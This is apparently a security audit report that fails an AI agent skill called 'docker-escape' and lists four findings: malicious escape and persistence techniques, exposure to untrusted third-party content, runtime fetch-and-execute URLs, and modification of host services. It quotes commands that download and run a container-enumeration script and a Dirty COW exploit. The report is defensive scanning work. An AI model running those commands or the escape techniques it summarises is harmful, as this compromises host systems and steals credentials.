docker-escape
Fail
Audited by Snyk on May 4, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). This content is an explicit, comprehensive malicious guide for Docker container escape and host compromise—detailing remote code execution (reverse shells), credential exfiltration, privilege escalation, creating privileged containers via docker.sock/Remote API, overwriting core_pattern, writing SSH keys/crontabs for persistence, and exploiting multiple CVEs.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 1.00). The skill's workflow explicitly instructs fetching and executing public, untrusted third-party content (e.g., git clone and curl raw GitHub URLs and external links shown in references/escape-methods.md and SKILL.md such as "git clone https://github.com/..." and "curl -sL https://github.com/.../deepce.sh"), which the agent would read/run as part of its exploitation steps and could thus introduce indirect prompt-injection.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill includes explicit runtime fetch-and-execute commands that pull remote exploit code (e.g., curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -o /tmp/deepce.sh and git clone https://github.com/gbonacini/CVE-2016-5195 && make && ./dcow), so these URLs are used at runtime to obtain and run remote code.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). The prompt provides explicit, step-by-step instructions and commands to escape Docker containers and modify host state (mount host filesystems, create privileged containers, write to /etc or cron, change core_pattern, use docker.sock/remote API), which directly instructs actions that require elevated privileges and compromise the machine.
Issues (4)
- CRITICAL E006: Malicious code pattern detected in skill scripts.
- MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- MEDIUM W013: Attempt to modify system services in skill instructions.